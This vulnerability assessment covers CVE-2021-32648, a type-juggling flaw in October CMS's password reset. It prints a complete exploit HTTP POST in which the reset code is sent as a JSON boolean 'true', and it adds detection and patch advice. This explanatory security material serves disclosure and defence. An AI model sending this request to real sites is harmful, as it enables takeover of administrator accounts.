octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5. **Recent assessments:** **kevthehermit** at January 14, 2022 5:01pm UTC reported: ### Ovewrview This is a simple Type Confusion / Juggling vulnerability. October CMS will check to see if the User Supplied reset code matches the value in the database `return ($this->reset_password_code == $resetCode);` If we can send a boolean value in place of a reset code we can bypass this check. Laravel has a feature that if an HTTP POST request is sent as JSON then It will be converted to a matching form data set however the types will persist. To exploit this vulnerability we simply need to set the `Content-Type` to JSON and structure our POST request accordingly. An example POST is shown below. POST /backend/backend/auth/reset/1/[] HTTP/1.1 Host: Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: october_session=eyJpdiI6ImlGZHMrRTVEUGh6dHkxWllEeVF5dEE9PSIsInZhbHVlIjoiV2tkcmsrbkJxa2R6OWg1TVFLbTQ2Y1pTSG9ZT1RYTEFwdlY0YVVRVEU5a0pxbG5LdE81WVpXeDdGa3pHclhTWGhkbEE2WGZPME82aEpVWFBqcktEakR6Qng3WVpsWUdzYm9mOG9cL0YxTjNXbXFyUEZxWGNVM1BrcmJLaFVIZXVaIiwibWFjIjoiZmVkMDljNGE2MDc2ZGI5NjgyOThkMDJjZGFhNDcxYzg3MTNlNmJhZTRiYmIzZmVkYjNmYTUyMzA4ZjQxMjdiNiJ9 Connection: close {"_session_key":"RQjdfLkFotyuA4BHOjVykboK3DHByTyDFEs7xZXC","_token":"jBD7MXYuIrYC4n0GClVCigIBrSOShoUICwy3gShS","postback":1,"id":1,"code":true,"password":"hello"} ### In the Wild This has not been verified but initial reports suggest this vulnerability was used to deface a set of Ukrainian government websites – <https://twitter.com/KimZetter/status/1481890639029551106> ### PoC A proof of concept python script that will attempt to reset the password for the admin account has been published – <https://github.com/Immersive-Labs-Sec/CVE-2021-32648> ### Detection An attacker attempting to exploit this attack will need to trigger a password reset email. If you observe password reset emails then check access to the server and respond accordingly. ### Mitigation Applying the patches will successfully mitigate against this attack. Assessed Attacker Value: 2 Assessed Attacker Value: 2Assessed Attacker Value: 5